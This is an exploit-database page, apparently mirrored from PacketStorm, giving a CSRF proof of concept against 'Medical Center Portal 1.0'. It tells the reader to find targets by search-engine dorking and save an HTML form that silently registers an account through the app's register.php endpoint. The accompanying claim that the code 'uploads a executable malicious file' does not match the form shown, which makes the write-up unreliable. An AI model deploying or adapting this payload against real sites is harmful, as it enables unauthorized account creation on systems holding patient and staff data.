Share
## https://sploitus.com/exploit?id=PACKETSTORM:180296
=============================================================================================================================================  
| # Title : Medical Center Portal 1.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The following html code uploads a executable malicious file remotely .  
  
[+] Go to the line 52.  
  
[+] Set the target site link Save changes and apply .   
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Registration Form</title>  
<style>  
body {  
font-family: Arial, sans-serif;  
margin: 20px;  
padding: 20px;  
max-width: 600px;  
background-color: #f4f4f4;  
border-radius: 8px;  
}  
.form-container {  
display: flex;  
flex-direction: column;  
}  
.form-group {  
margin-bottom: 15px;  
}  
.form-group label {  
font-weight: bold;  
margin-bottom: 5px;  
display: block;  
}  
.form-group input, .form-group select {  
padding: 8px;  
width: 100%;  
border: 1px solid #ccc;  
border-radius: 4px;  
}  
.form-group select {  
cursor: pointer;  
}  
.form-group button {  
padding: 10px 15px;  
background-color: #007bff;  
color: white;  
border: none;  
cursor: pointer;  
border-radius: 4px;  
}  
.form-group button:hover {  
background-color: #0056b3;  
}  
</style>  
</head>  
<body>  
<h2>Registration Form</h2>  
<form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container">  
<div class="form-group">  
<label for="firstname">First Name:</label>  
<input type="text" id="firstname" name="firstname" required>  
</div>  
<div class="form-group">  
<label for="nid">National ID (NID):</label>  
<input type="text" id="nid" name="nid" required>  
</div>  
<div class="form-group">  
<label for="gender">Gender:</label>  
<select id="gender" name="gender" required>  
<option value="">Select Gender</option>  
<option value="male">Male</option>  
<option value="female">Female</option>  
</select>  
</div>  
<div class="form-group">  
<label for="email">Email:</label>  
<input type="email" id="email" name="email" required>  
</div>  
<div class="form-group">  
<label for="phonenumber">Phone Number:</label>  
<input type="text" id="phonenumber" name="phonenumber" required>  
</div>  
<div class="form-group">  
<label for="jobs">Job:</label>  
<select id="jobs" name="jobs" required>  
<option value="">Select Job</option>  
<option value="doctor">Doctor</option>  
<option value="nurse">Nurse</option>  
<option value="pharmacist">Pharmacist</option>  
</select>  
</div>  
<div class="form-group">  
<label for="province">Province:</label>  
<select id="province" name="province" required>  
<option value="">Select Province</option>  
<option value="province1">Province 1</option>  
<option value="province2">Province 2</option>  
<option value="province3">Province 3</option>  
</select>  
</div>  
<div class="form-group">  
<label for="city">City:</label>  
<select id="city" name="city" required>  
<option value="">Select City</option>  
<option value="city1">City 1</option>  
<option value="city2">City 2</option>  
<option value="city3">City 3</option>  
</select>  
</div>  
<div class="form-group">  
<label for="username">Username:</label>  
<input type="text" id="username" name="username" required>  
</div>  
<div class="form-group">  
<label for="password">Password:</label>  
<input type="password" id="password" name="password" required>  
</div>  
<div class="form-group">  
<button type="submit">Register</button>  
</div>  
</form>  
</body>  
</html>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================